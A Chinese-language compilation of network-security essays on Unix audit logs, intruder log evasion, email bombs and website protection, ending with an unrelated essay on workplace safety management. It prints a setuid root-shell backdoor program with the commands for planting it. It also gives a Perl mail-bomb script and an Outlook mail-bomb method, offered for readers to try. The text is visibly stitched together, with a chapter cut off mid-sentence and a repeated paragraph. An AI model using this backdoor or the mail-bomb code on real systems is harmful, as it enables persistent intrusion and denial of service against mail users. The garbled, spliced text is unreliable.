大量的“斷開” 可能意味著有人在試驗(yàn)“注冊(cè)名,口令”序列組試圖侵入系統(tǒng)中。報(bào)告的最后一部分是有關(guān)用戶最后一次注冊(cè)的信息，這個(gè)最后注冊(cè)報(bào)告是隨著用戶的 不斷注冊(cè)、退出而時(shí)刻更新的。報(bào)告中還包括用戶名及最后的注冊(cè)時(shí)間，越早退出系統(tǒng) 的帳號(hào)排在越前。這個(gè)報(bào)告對(duì)于發(fā)現(xiàn)那些死帳號(hào)非常有用，管理員可能會(huì)在這里發(fā)現(xiàn)一 些奇怪的事情如有人注冊(cè)到系統(tǒng)管理的帳號(hào)中(如bin或sys)。

2.2 BSD系統(tǒng)的記帳

BSD系統(tǒng)的進(jìn)程記帳用/usr/etc/accton程序啟動(dòng)。默認(rèn)的記帳文件為/usr/adm/acct 只要啟動(dòng)了進(jìn)程記帳，該文件會(huì)增長得很快。BSD有兩條命令來處理記帳信息。第一條是 /usr/etc/ac,處理在usr/adm/wtmp文件中的注冊(cè)信息，第二條是 /usr/etc/sa,產(chǎn)生已用 命令的小結(jié)報(bào)告，保存在/usr/adm/savacct文件中。

BSD系統(tǒng)中也有與acctcom類似的命令叫做lastcomm。lastcomm命令反向搜索/usr/adm/acct 文件，產(chǎn)生出與acctcom命令相似的結(jié)果。

BSD記帳系統(tǒng)也和System V一樣，有類似的缺陷(從安全性角度講),即不保留命令的參數(shù)。并且，BSD系統(tǒng)沒有最后注冊(cè)的報(bào)告。

現(xiàn)在針對(duì)前面的兩點(diǎn)防衛(wèi)措施，從攻的角度來看：

1.對(duì)與第一點(diǎn)中用w、who、last、ps等命令，hacker完全可以用程序?qū)⒆约旱挠涗涬[藏 起來，使管理員用以上幾個(gè)命令都查看不到。當(dāng)然此時(shí)hacker已經(jīng)把root的權(quán)限得到 手(如何得到，下章討論)。

2.就算最笨的hacker,當(dāng)他無法隱藏自己時(shí)，他也會(huì)把整個(gè)記錄文件刪除掉，免得管理員 查到用什么帳號(hào)從哪里登錄進(jìn)來，運(yùn)行了些什么指令。但顯而易見，雖然管理員此時(shí)(沒安裝第三方的審記軟件時(shí))不能知道誰人在哪里發(fā)起攻擊，但也無疑地告訴管理員 “你的系統(tǒng)已經(jīng)給攻破了”。

3.歷史文件記錄

ksh、csh、sh、bash、zsh都可保存歷史文件。其文件如下: sh:.sh_history(sh 也即Bourne shell)csh:.history ksh:.sh_history bash:.bash_history zsh:.history

在運(yùn)行sh和ksh的用戶的相應(yīng).profile中，加入HISTORY=100，可指定.sh_history

文件保存該用戶最近運(yùn)行的100條記錄。對(duì)于csh，則在.cshrc文件中加入, set history=100,則可。用戶可以運(yùn)行history指令來查看歷史文件中的內(nèi)容。對(duì)于Ksh、sh 也可運(yùn)行 tail-f.sh_history 來查看，其順序是從最近的運(yùn)行的指令開始。而C shell 是在退出才能更新文件，所以不能用tail來觀察Cshell執(zhí)行了那些命令。這些歷史文件比進(jìn)程記帳更為有用，因?yàn)槊畹膮?shù)也被保留下來，所以可通過執(zhí)行 執(zhí)行命令的上下文聯(lián)系察覺到用戶干了些什么。但話又說回來,其實(shí)這只起到一定作用而 已。BTW:.profile用于Bourne和Korn shell;.login和.cshrc用于C shell。

4.找出屬主為root且?guī)位的程序:

以root身份執(zhí)行以下的指令, 找出此類文件，看看是否有可疑的程序存在。

#find /-perm-4000-exec /bin/ls-lab {} “;”

其實(shí)在以前post的文章 1284 “系統(tǒng)安全技術(shù)的研究” 已有討論過如何得到root shell 當(dāng)hacker進(jìn)入系統(tǒng)后,大部份是利用buffer overflow取得root shell 例如:solaris 中帶s位的fdformat,ufsdump,ping等;AIX中xlock;SGI中的xlock;digital中的dop;等等，都給hacker找出其漏洞。當(dāng)hacker利用這些big bugs取的root shell后，若其想以后還想入侵此系統(tǒng)的話，當(dāng)然是留下root shell的程序，此時(shí)hakcer也不關(guān)心原來的bugs是否給fix掉，他/她 不再需要利用bug了，只須運(yùn)行自己留下的root shell即給。以下給出得到root shell的簡單程序:

#cat getrootshell.c void main(void){

setuid(0,0);

execl(“/bin/sh”, “sh”,0);}

編譯后得到bin文件。此外，接著寫入： #cc-o getrootshell getrootshell.c #chmod 4777 getrootshell #chown root:other getrootshell #ls-al getrootshell

-rwsrwxrwx 1 root other 5 Oct 12 06:14 getrootshell(注意全過程是在取的rootshell后，才可這樣做)

這樣hacker就在該系統(tǒng)中留下了后門，下次入來后就不需利用還沒fix的 fdformat,xlock,dop等bug 的程序了，直接運(yùn)行g(shù)etrootshell程序，就可跳成root了。因此，管理員要查清此類型的文件。

現(xiàn)在從攻的角度來看上面兩點(diǎn)防衛(wèi)措施:

1..對(duì)于history文件，當(dāng)hacker進(jìn)入系統(tǒng)后可以改變shell類型，來使保存他后來所有指 令的history文件失效。因此，當(dāng)hacker用crack到的帳號(hào)進(jìn)入系統(tǒng)后，第一條所敲的指令 是改變shell類型的指令.example in digital unix下: c:>telnet XXX.XXX.XXX.XXX Digital UNIX(center)(ttyp5)login: tommy Password:

Last login: Sun Oct 11 22:43:51 from HPVC.com

Digital UNIX V4.0A(Rev.464);Sat Feb 7 19:54:12 GMT+0800 1998

The installation software has successfully installed your system.There are logfiles that contain a record of your installation.These are:

/var/adm/smlogs/install.cdfgeneral log file

/var/adm/smlogs/install.FS.loglog for the setld(8)utility /var/adm/smlogs/fverify.log-verification log file center>chsh Old shell: /bin/sh New shell: ksh

其他系統(tǒng)不在此一一列舉。

2.對(duì)于類似getrootshell的bin文件,hacker也不會(huì)真的那么愚蠢到起這個(gè)名字，且他們 會(huì)將此類型的程序藏在不易察覺的目錄下，如果不是老練的管理員是不會(huì)發(fā)現(xiàn)的。(注:一般來說,hacker不會(huì)把getrootshell文件刪除的，因?yàn)樗膊荒芸隙ㄏ麓芜M(jìn)入系統(tǒng)時(shí)那些bugs還是否可以利用,使其變r(jià)oot)

第二章

網(wǎng)站的通用保護(hù)方法

針對(duì)黑客威脅，網(wǎng)絡(luò)安全管理員采取各種手段增強(qiáng)服務(wù)器的安全，確保文檔中的屬性符號(hào)，不進(jìn)行屏蔽會(huì)對(duì)論壇造成嚴(yán)重的后果，網(wǎng)絡(luò)上不是有很多“小兒科”的聊天室踢人術(shù)嗎？簡單的方式是不允許小于號(hào)和大于號(hào)的出現(xiàn)，因?yàn)樗蠬TML語法必須包含在這兩個(gè)字符間，如果程序檢測到它們就返回一個(gè)錯(cuò)誤提示，下面一行Perl代碼快速地清除了這兩個(gè)字符： $user_input=~s/<>//g;當(dāng)然，還有比較好的選擇，就是將這兩個(gè)字符轉(zhuǎn)換成它們的 HTML換碼(特殊的代碼),用于表示每個(gè)字符而不使用該字符本身。下面的代碼通過全部用<替換了小于符號(hào)，用>替換了大于符號(hào)，從而完成了轉(zhuǎn)換過程: $user_input=~s//& gt;/g;

三、編寫簡單的郵件炸彈：

利用Perl程序可以非常快速的編寫郵件炸彈程序，這種方法比起直接使用別人編寫的郵件炸彈要好的多，至少能夠真正“體會(huì)一下”什么才是黑客。這個(gè)炸彈的編譯環(huán)境是具備一臺(tái)有CGI權(quán)限的網(wǎng)絡(luò)服務(wù)器，同時(shí)這臺(tái)服務(wù)器上提供了sendmail命令（當(dāng)然這一切可以在自己的系統(tǒng)上進(jìn)行設(shè)置），并且還要初步了解有關(guān)perl語言的知識(shí)。

程序的原理非常簡單，就是利用sendmail命令向目標(biāo)重復(fù)發(fā)送相同內(nèi)容的電子郵件，為了控制發(fā)送郵件的數(shù)量，我們聲明一個(gè)計(jì)數(shù)器變量，同時(shí)將程序用while()函數(shù)做循環(huán)，下面是程序的源代碼：

#!/bin/perl $file='/user/lib/sendmail';$target='someone@target.com';$count=0;while($count<1000){ open(MAIL,“/$file$target”)|| die“ Can not open $file!n print MAIL”哈哈，你被攻擊啦“ close(MAIL);sleep 3;$count++;}

程序就上面這些。Perl屬于解釋型語言，因而不需要進(jìn)行編譯，直接將源代碼上傳到服務(wù)器上，然后設(shè)置成為755或者775型，就可以通過瀏覽器調(diào)用而直接使用了。程序中的$file和$target變量分別定義了sendmail命令的路徑和目標(biāo)的地址，在使用此程序以前要根據(jù)個(gè)人需要進(jìn)行修改，而$count變量是我們要發(fā)送的炸彈郵件數(shù)量，因?yàn)榘l(fā)送郵件工作是服務(wù)器完成的，因而速度非?？?，這個(gè)數(shù)量可以設(shè)置的大一些，我們并不會(huì)感覺到程序的緩慢。

四、使用Outlook制作電子郵件炸彈：

相對(duì)上一種方法，這個(gè)方法更加直接，它不需要專用工具而只需要利用Outlook電子郵件客戶端軟件就可以輕松完成。首先介紹一下郵件炸彈的基本原理：電子郵件炸彈一般來說分成兩種。一種是通過發(fā)送巨大的垃圾郵件使對(duì)方電子郵件服務(wù)器空間溢出，從而造成無法接受電子郵件；另一種方法是無休止的發(fā)送相同內(nèi)容的但很小的郵件使對(duì)方接收不過來而放棄自己的電子郵箱。因此我們只要實(shí)現(xiàn)其中的一種即可稱之為“郵件炸彈”。使用Outlook制作電子郵件炸彈就是利用了上面說的第二種方法，不斷的向指定目標(biāo)發(fā)送電子郵件，首先我們要做一些準(zhǔn)備工作：申請(qǐng)一個(gè)免費(fèi)的電子信箱，并把這個(gè)信箱賬號(hào)設(shè)置到Outlook中，然后選擇Outlook工具菜單的“工具”-〉“賬號(hào)”，選擇其中剛剛申請(qǐng)的那個(gè)電子郵件賬號(hào)，然后點(diǎn)擊窗口右面的“屬性”按鈕。在出現(xiàn)的屬性窗口中繼續(xù)點(diǎn)擊窗口上面的“高級(jí)”標(biāo)簽，更改“發(fā)送”設(shè)置中的“郵件拆分大小”屬性值，這個(gè)值盡量更改的小一些（推薦更改成16），確認(rèn)退出。

這樣以后只要使用這個(gè)經(jīng)過設(shè)置的電子信箱發(fā)電子郵件，只要郵件的大小超過了規(guī)定的字節(jié)數(shù)，Outlook就會(huì)自動(dòng)將電子郵件進(jìn)行分割，例如一封1600KB的信件，將它拆分成16KB一封的電子郵件發(fā)送給對(duì)方，對(duì)方的信箱中就會(huì)出現(xiàn)100多封電子郵件，郵件炸彈的功能就實(shí)現(xiàn)了！

五、如何防止電子郵件炸彈：

電子郵件的防范可以從多個(gè)方面著手，例如未雨綢繆從開始就謹(jǐn)慎的使用電子信箱，或者也可以亡羊補(bǔ)牢盡快修復(fù)電子信箱。在網(wǎng)絡(luò)上，大多數(shù)關(guān)于防范郵件炸彈的文章都說的是Linux等系統(tǒng)，而真正涉及初級(jí)用戶的并不是很多，然是實(shí)際更多的人使用的還是Windows系統(tǒng)，即便pop3服務(wù)器是Linux系統(tǒng)，現(xiàn)在也沒有更多的人通過傳統(tǒng)的命令方式接收郵件了，這里將講述一個(gè)與讀者聯(lián)系緊密的防止電子郵件炸彈的方法。

1、不公開信箱地址、準(zhǔn)備多個(gè)信箱：

早作準(zhǔn)備，不讓黑客知道自己的電子信箱地址是最好的方法，這就需要使用者在網(wǎng)絡(luò)上盡量少的公開自己的信箱地址，不要輕易將地址留給不認(rèn)識(shí)的人或者留在電子論壇上。當(dāng)然，如果可以，使用者可以多申請(qǐng)幾個(gè)電子信箱，不同的信箱聯(lián)絡(luò)不同的人，專門預(yù)備出一個(gè)公開的電子信箱，一旦受到攻擊也不會(huì)造成過多的損失。

2、使用軟件快速清理炸彈郵件：

使用BombCleaner等炸彈清理軟件，可以在不接受信件的時(shí)候察看郵件清單，從中選擇垃圾信件進(jìn)行遠(yuǎn)程刪除，這樣做可以節(jié)省大量下載信件的時(shí)間，同時(shí)也堵住了通過電子郵件傳播的病毒。但是這種方法有它最明顯的缺陷：一旦信箱已經(jīng)被郵件塞滿了，就來不及刪除上面的信件、而且信發(fā)送過來的重要信件也無法接收了。

3、設(shè)置信箱過濾：

信箱過濾可以很好的解決上面軟件解決不了的問題。過濾器可以設(shè)置在本地的電子郵件客戶端程序上，也可以直接通過瀏覽器在pop3信箱的內(nèi)部進(jìn)行設(shè)置，前者和上面介紹的利用軟件基本類似，也是在接收電子郵件的時(shí)候?qū)︵]件是否屬于垃圾或炸彈進(jìn)行判斷，所以在信箱被塞滿的時(shí)候也不見的起到什么效果。

但是，如果能夠在pop3服務(wù)器上設(shè)置自己信箱的過濾，就可以從根本上避免被攻擊的可能了。具體做法是這樣的，通過瀏覽器登陸到pop3服務(wù)器上，然后進(jìn)入自己的信箱，之后找到“郵件收發(fā)設(shè)置”，并且在其中的過濾器內(nèi)填寫有關(guān)發(fā)送垃圾郵件的郵件地址（多 個(gè)地址可以用分號(hào)隔開），并且確認(rèn)保存，這樣就能夠在服務(wù)器上過濾掉炸彈郵件、保障自己的電子信箱安全了。

4、設(shè)置接收郵件的大?。?/p>

如果黑客發(fā)送過來的不是成百上千封“小信件”，而是一封上百兆的炸彈怎么辦呢？這種郵件不需要多少，一封過來就可以把電子信箱塞的滿滿的，所以用戶在設(shè)置“過濾”的時(shí)候，還要注意“接收信件大小”選項(xiàng)，最好將這個(gè)數(shù)值控制在電子信箱的三分之一左右。例如使用者的電子信箱空間是三十兆，那么可以通過設(shè)置規(guī)定接收信件的大小不得超過十兆每一封，如果超過了這個(gè)數(shù)值，那么來信將被確認(rèn)為郵件炸彈，而直接被系統(tǒng)舍棄，這樣郵件炸彈便再無施展自己的空間了。

第五章

網(wǎng)站保護(hù)的缺陷

目前中國國內(nèi)

80％的網(wǎng)站存在安全隱患，20％的網(wǎng)站有嚴(yán)重的安全問題。一位“黑客”甚至說如果他敲鍵的速度足夠快的話，一天可以黑掉100個(gè)網(wǎng)站！這多少可以反映中國網(wǎng)絡(luò)安全所存在的問題。

網(wǎng)絡(luò)信息安全研究的人員認(rèn)為這首先是沒有安全意識(shí)。北京中聯(lián)綠盟公司副總經(jīng)理高永安說，一些網(wǎng)站認(rèn)為他們的公司還小，不會(huì)成為黑客攻擊的目標(biāo)，即使被黑也不會(huì)有什么損失。廣州京九公司總經(jīng)理萬濤認(rèn)為，信息安全來自三個(gè)方面：技術(shù)、管理和學(xué)習(xí)，加強(qiáng)信息安全不能光做技術(shù)，還要重視內(nèi)部管理和人員培養(yǎng)。而一些網(wǎng)絡(luò)安全公司的不負(fù)責(zé)態(tài)度，也據(jù)估計(jì)不利于中國信息安全的提高。據(jù)分析，中國信息安全市場容量將達(dá)到1000億元，目前從事信息安全服務(wù)的公司已超過一百家，但是市場卻相當(dāng)混亂。有些安全公司為了獲得業(yè)務(wù)，甚至刻意地尋找甚至制造一些網(wǎng)絡(luò)公司的系統(tǒng)漏洞，然后以此為籌碼與網(wǎng)絡(luò)公司談判。一些媒體的片面報(bào)道，也可能產(chǎn)生不利的影響。據(jù)最近在廣州進(jìn)行的一次調(diào)查顯示，4％的小學(xué)生希望成為黑客。媒體報(bào)道黑客事件時(shí)有兩個(gè)傾向，一是玄化，將信息安全和黑客說得神乎其神；二是美化，將黑客塑造成英雄和偶像來崇拜。因此媒體必須加強(qiáng)引導(dǎo)，不要盲目地炒作黑客行為，更不能鼓吹黑客的破壞性。

可見，國內(nèi)網(wǎng)站安全存在必然隱患的問題必須得以正視。盡管網(wǎng)站保護(hù)軟件能進(jìn)一步提高系統(tǒng)的安全，仍然存在一些缺陷。首先這些保護(hù)軟件都是針對(duì)靜態(tài)頁面而設(shè)計(jì)，而現(xiàn)在動(dòng)態(tài)頁面占據(jù)的范圍越來越大，盡管本地監(jiān)測方式可以檢測腳本文件，但對(duì)腳本文件使用的數(shù)據(jù)庫卻無能為力。

另外，有些攻擊并不是針對(duì)頁面文件進(jìn)行的，前不久泛濫成災(zāi)的”Red Code"就是使用修改IIS服務(wù)的一個(gè)動(dòng)態(tài)庫來達(dá)到攻擊頁面的目的。另一個(gè)方面，網(wǎng)站保護(hù)軟件本身會(huì)增加WWW服務(wù)器的負(fù)載，在WWW服務(wù)器負(fù)載本身已經(jīng)很重的情況下，一定好仔細(xì)規(guī)劃好使用方案

結(jié)束語

本文側(cè)重在網(wǎng)站安全方面來談，討論了網(wǎng)站常用的保護(hù)方法，詳細(xì)地分析比較了專用網(wǎng)站保護(hù)軟件采用的各種技術(shù)實(shí)現(xiàn)和優(yōu)缺點(diǎn)，并指出了其缺陷。安全雖不是使用某個(gè)工具或某些工具就可以解決的，但使用這些工具能幫助提高安全性，減少安全風(fēng)險(xiǎn)。只有更好 29 的保障網(wǎng)站的安全，才能便于網(wǎng)站的管理。

網(wǎng)絡(luò)信息安全研究的人員認(rèn)為這首先是沒有安全意識(shí)。北京中聯(lián)綠盟公司副總經(jīng)理高永安說，一些網(wǎng)站認(rèn)為他們的公司還小，不會(huì)成為黑客攻擊的目標(biāo)，即使被黑也不會(huì)有什么損失。廣州京九公司總經(jīng)理萬濤認(rèn)為，信息安全來自三個(gè)方面：技術(shù)、管理和學(xué)習(xí)，加強(qiáng)信息安全不能光做技術(shù)，還要重視內(nèi)部管理和人員培養(yǎng)。而一些網(wǎng)絡(luò)安全公司的不負(fù)責(zé)態(tài)度，也據(jù)估計(jì)不利于中國信息安全的提高。據(jù)分析，中國信息安全市場容量將達(dá)到1000億元，目前從事信息安全服務(wù)的公司已超過一百家，但是市場卻相當(dāng)混亂。有些安全公司為了獲得業(yè)務(wù)，甚至刻意地尋找甚至制造一些網(wǎng)絡(luò)公司的系統(tǒng)漏洞，然后以此為籌碼與網(wǎng)絡(luò)公司談判。一些媒體的片面報(bào)道，也可能產(chǎn)生不利的影響。據(jù)最近在廣州進(jìn)行的一次調(diào)查顯示，4％的小學(xué)生希望成為黑客。媒體報(bào)道黑客事件時(shí)有兩個(gè)傾向，一是玄化，將信息安全和黑客說得神乎其神；二是美化，將黑客塑造成英雄和偶像來崇拜。因此媒體必須加強(qiáng)引導(dǎo)，不要盲目地炒作黑客行為，更不能鼓吹黑客的破壞性。

參考文獻(xiàn)

主要參考文獻(xiàn)： ??????

第五篇：淺析安全管理與創(chuàng)新

淺析安全管理與創(chuàng)新

創(chuàng)新、創(chuàng)造是企業(yè)發(fā)展的主題，也是前進(jìn)的源動(dòng)力；一個(gè)企業(yè)沒有了創(chuàng)新就像汪洋中的一條船,失去了動(dòng)力在原地打轉(zhuǎn)是十分危險(xiǎn)的;而安全又是企業(yè)生存發(fā)展的基礎(chǔ)，企業(yè)的創(chuàng)新、創(chuàng)造，也就意味著安全管理的手段、模式、技術(shù)等方面不能一成不變，也必須緊跟上時(shí)代發(fā)展的步伐。

1.宣傳手段創(chuàng)新.現(xiàn)在一提到安全宣傳，大家首先想到的是掛橫幅、看錄像、辦黑板報(bào)展評(píng)等等，這些宣傳手段是最基本的、傳統(tǒng)的、行之有效的。但是，隨著社會(huì)的發(fā)展，人員素質(zhì)的提高，科技的進(jìn)步，特別是年輕員工的加入，這些傳統(tǒng)的宣傳手段已不能滿足安全信息的傳播、傳遞；人們需要更新、更快的宣傳載體,渴求更新鮮、更豐富的宣傳內(nèi)涵的加入。現(xiàn)在電腦、智能手機(jī)已經(jīng)非常普及，網(wǎng)絡(luò)、WIFI信號(hào)也到處覆蓋，安全宣傳完全可以借助微信、QQ、電子郵件等工具給員工發(fā)送有教育意義的安全短信、視頻，或者生日問候、安全提醒等 ；成本少，但宣傳面卻很廣、很快，效果迥異。

另外，常見的安全宣傳口號(hào)總是“安全第一，預(yù)防為主”、“安全責(zé)任重于泰山”這幾句，如果能夠增加一些如“愛妻愛子愛家庭，出了事故等于零”、“見了違章嚴(yán)批評(píng)，道是無情卻有情”、“與其事后痛苦流涕，不如事前遵章守紀(jì)”等更人性化的口號(hào)，肯定會(huì)引起更多員工的關(guān)注和共鳴。

2.管理模式創(chuàng)新.安全檢查一直是安全管理的基本方法；什么專項(xiàng)檢查、綜合檢查、節(jié)前節(jié)后檢查等等；這些是必須的，也是必要的；但這只是從管理層角度出發(fā)的一種行為，是單向的，被查員工往往有抵觸情緒；怎么樣能讓員工自己主動(dòng)地去自查自糾存在的隱患和違章，從被動(dòng)安全轉(zhuǎn)變?yōu)橹鲃?dòng)安全呢?俗話說“群眾的眼睛是雪亮的”，能否對(duì)員工設(shè)立隱患舉報(bào)獎(jiǎng)勵(lì)機(jī)制，調(diào)動(dòng)員工查隱患的積極性；對(duì)確認(rèn)的隱患,給予舉報(bào)者獎(jiǎng)勵(lì),并及時(shí)整改；讓隱患和違章象過街老鼠一樣,人人喊打,使其失去存在的土壤。

目前公司的監(jiān)控視頻只安裝在保安室，對(duì)現(xiàn)場安全生產(chǎn)的監(jiān)督意義不大；能否讓部門、基地工廠的負(fù)責(zé)人、安全管理員也安裝監(jiān)控軟件，打開電腦就能看到重點(diǎn)部位、關(guān)鍵工序的作業(yè)畫面，有利于及時(shí)發(fā)現(xiàn)生產(chǎn)異常和違章行為，充分發(fā)揮視頻監(jiān)控的作用，彌補(bǔ)現(xiàn)場檢查的不足,轉(zhuǎn)變等別人匯報(bào)安全問題的模式，這在現(xiàn)在是不難做到的事情；對(duì)于8小時(shí)之外、加班時(shí)間的監(jiān)管，同樣也可以借鑒使用此方法。

3.安全技術(shù)創(chuàng)新.安全是生產(chǎn)力！安全工作是科學(xué)性的體現(xiàn)；本質(zhì)安全，是安全技術(shù)的目標(biāo)追求！在安全工作中，科技含量越高，安全嚴(yán)謹(jǐn)性就越大；企業(yè)安全除了嚴(yán)格管理更需要技術(shù)創(chuàng)新；企業(yè)要發(fā)展就必須不斷地加大對(duì)新設(shè)備的投入、新技術(shù)的研發(fā)；淘汰安全隱患大、生產(chǎn)效率低的設(shè)備和工藝，全面推動(dòng)企業(yè)轉(zhuǎn)型升級(jí)，改善工作環(huán)境，降低員工勞動(dòng)強(qiáng)度，努力給員工創(chuàng)造一個(gè)安全、穩(wěn)定的工作環(huán)境；有了安全技術(shù)創(chuàng)新，企業(yè)才有免疫力,才能不斷增強(qiáng)競爭力，才能在市場上始終處于領(lǐng)先地位！

安全管理工作要與時(shí)俱進(jìn)，不斷創(chuàng)新，最大限度地消除事故隱患，減少事故發(fā)生，保障人身安全、財(cái)產(chǎn)安全。

安全管理將伴隨著公司的創(chuàng)新、創(chuàng)造，永續(xù)美好的未來！